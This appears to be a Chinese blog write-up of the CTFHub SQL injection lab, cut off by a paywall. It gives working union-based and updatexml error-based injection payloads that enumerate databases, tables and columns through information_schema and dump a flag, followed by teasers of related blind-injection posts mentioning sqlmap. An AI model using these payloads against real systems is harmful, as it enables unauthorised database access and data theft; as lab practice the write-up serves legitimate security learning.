CTFHUB-WEB-SQL注入【04】整数、字符、报错注入、布尔盲注、时间盲注、cookie注入、UA注入、refer注入

最新推荐文章于 2024-10-16 20:50:44 发布
最新推荐文章于 2024-10-16 20:50:44 发布
阅读量417 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/grb819/article/details/117753438
版权
本文详细介绍了几种常见的SQL注入攻击手法,包括字符型注入、报错注入、布尔盲注等,并提供了具体的实施步骤与实例。此外,还介绍了如何利用工具如sqlmap进行自动化攻击,以及在不同注入场景下的应对策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

!

字符型注入

1. 输入1:1被引起

1
在这里插入图片描述

2. ’ 提前闭合

?id=1’ and 1=1–+

3. 求列数

?id=1’ order by 2–+
在这里插入图片描述

4. 求数据库名

?id=-1' union select database(),2--+

在这里插入图片描述

5. 求表名

?id=-1' union select group_concat(table_name) ,2 from information_schema.tables where table_schema='sqli' --+

数据库名是sqli
在这里插入图片描述

6. 求列名

表名是flag

?id=-1' union select group_concat(column_name) ,2 from information_schema.columns where table_name='flag' --+

在这里插入图片描述

7. 求字段

列名flag

?id=-1' union select group_concat(flag)  ,2 from sqli.flag --+

在这里插入图片描述

报错注入

1.输入1

在这里插入图片描述

2. 求数据库

UPDATEXML (XML_document, XPath_string, new_value);

?id=1 and 1=(updatexml(1,concat(0x7e,database(),0x7e),1))

在这里插入图片描述

3.求表名

?id=1 and 1=(updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='sqli')),1))

在这里插入图片描述

4.求列名

?id=1 and 1=(updatexml(1,concat(0x7e,(select
最低0.47元/天 解锁文章
ctfhub-sql布尔盲注
god_001的博客
06-01 830
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHUB-web-SQL注入
ookami6497的博客
11-29 998
CTFHUB SQL
布尔盲注ctfhub
2401_82985722的博客
03-27 2155
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
CTFHUB-布尔盲注
Web学习之路
03-24 1441
true 与 false
ctfhub 布尔盲注
plant1234的博客
06-17 1748
布尔盲注: 布尔盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schem
CTFhub布尔盲注
ndjnddjxn的博客
04-12 1493
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1350
CTFHUB-WEB-SQL注入
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 646
目录Level 1整数注入字符注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数注入 输入1 and 1=1 和1 and 1=2 输
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1222
ctfhubSQL注入中的flag是动态生成的 1、整数注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHub | 布尔盲注
尼泊罗河伯的博客
10-29 1998
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。构造 payload 验证是否属于整数注入,确定此题为整数注入。使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFhub 报错注入 and
m0_63253040的博客
04-01 2645
报错注入 Xpath报错: ...省略 要意这里要用left right 或者用substr或者limit都可以试试 也可以用floor 或者sqlmap去试试都可以 布尔盲注: 输入0返回query_error 输入1返回query_success 数据库名字长度 数据库名: 这题当查询数据库为空的时候也是回显成功 需要用到if(expr1,expr2,expr3)和子查询 子查询格式:select * from users where id=(select .
CTFhub布尔盲注脚本
qq_41565526的博客
02-04 603
CTFhub布尔盲注脚本
CTFHUB技能树之SQL——布尔盲注
最新发布
weixin_73049307的博客
10-16 1453
显示查询成功但没有回显出相关信息,初步判断是布尔盲注入、时间盲注报错注入。还是没有回显,到这里已经可以确认是布尔盲注了,且是整数注入。第一个字符是"f",后续就不多描述了,是flag表。第一个字符是"f",后续就不多描述了,是flag列。后续流程实在是太长了,就直接用sqlmap直接爆了。这里为了节省时间就直接爆第二个表的字符了。说明第一个字符是115,对应字符's'(因为知道是news表和flag表)(4)爆字段内容(flag)查询成功,说明表有两个。说明第一个字符是"c"得到数据库名长度是4。
CTFHub布尔盲注(新的payload)
weixin_44732566的博客
02-23 5619
CTFHub 布尔盲注 题目已经表明是布尔盲注,发现没有闭合,也木有过滤,本来也是道基础题,但是发现回显不对头: payload:?id=1 and 's'='p' 回显是query_success 这道题和普通的布尔盲注不一样,一般布尔盲注(我做的也不多)是数据库查询结果为空或者查询语句报错,回显error。这道题是数据库查询为空,返回还是success,只有当查询语句报错时才返回erroe。 ...
CTFHUB-WEB-SQL注入-布尔盲注
weixin_43486981的博客
08-10 1604
知识点: Burp suite爆破模块intruder的设置: Positions设置 attack type:攻击模式设置 sniper:对变量依次进行破解。多个标记依次进行。单参数爆破,多参数时同一个字典按顺序替换各参数,总之初始值有一个参数不变。 battering ram:对变量同时进行破解。多个标记同时进行。多参数同时爆破,但用的是同一个字典。 pitchfork:每一个变量标记对应一个字典,取每个字典的对应项。 多参数同时爆破,但用的是不同的字典。 cluster bomb:每个变量对应一个字
CTFHub(布尔盲注 判断是否,无回显)
sGanYu
08-06 2197
主要分为两种,一种为时间类型,一种为布尔类型 判断是否是布尔类型的:当一个界面存在注入,但是没有显示位,没有SQL语句执行错误信息,由于布尔类型的注入只会告知是或者不是,所以只能通过页面返回的对与错来进行一个SQL注入 【 column_name:列的名称 Information_schema.columns:表示所有的列的信息 Information_schema:表示所有信息,包括库、表、列 Information_schema.tables:表示所有的表的信息 tabl
CTFHub-web(sql布尔盲注)
分享与记录
07-22 4998
文章目录手工注入sqlmap注入总结 手工注入 1. 题目直接说明了是布尔,来简单验证一下 2. 既然如此,那么构造SQL语句,得到数据库长度 3. 数据库名称的长度为4,然后可以猜解出数据库的名称 得知当前数据库的第一个字母是s 然后依次得到数据库的第2个字母到第4个字母 最后对照ASCII表 得到当前数据库名称为sqli 4. 得到数据库中表的数量 前面只是演示如何得到数据库的名称 其实后面可以直接用database()来代替sqli 1 and (select count(t
CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 1083
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
clj-di: Clojure与ClojureScript依赖注入工具
资源摘要信息:"clj-di:用于测试 Clojure 和 ClojureScript 的依赖注入和实用程序带" Clojure 是一种现代、通用、具有函数式编程特性的Lisp语言,运行在Java虚拟机上。ClojureScript是Clojure语言的一个变种,专为...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值